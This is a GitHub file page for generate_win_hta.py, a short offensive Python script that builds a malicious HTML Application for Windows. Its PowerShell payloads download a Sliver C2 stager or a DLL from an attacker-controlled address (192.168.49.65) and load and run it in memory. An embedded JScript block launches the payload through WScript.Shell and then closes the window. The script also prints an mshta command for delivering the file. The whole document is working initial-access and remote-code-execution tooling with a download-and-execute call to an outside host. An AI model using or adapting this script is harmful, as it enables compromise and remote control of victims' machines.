-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathgenerate_win_hta.py
More file actions
executable file
·25 lines (21 loc) · 977 Bytes
/
generate_win_hta.py
File metadata and controls
executable file
·25 lines (21 loc) · 977 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
PAYLOAD = """powershell.exe -c \\"$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.49.65/win_msf_sliver_stager.exe')\\";$assem = [System.Reflection.Assembly]::Load($data);[SliverStager.Stager]::Main()"""
# DLL Runner
PAYLOAD = """cmd.exe /c powershell.exe -c \\"$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.49.65/DLL-Runner-x64.dll');$assem = [System.Reflection.Assembly]::Load($data);$class = $assem.GetType('LeMans.Class1');$method = $class.GetMethod('ferrari');$method.Invoke(0, $null)\\" """
TEMPLATE = f"""
<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("{PAYLOAD}");
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>
"""
print(TEMPLATE)
print('Run with: mshta http://192.168.49.65/foo.hta')
print('Or dl and run locally')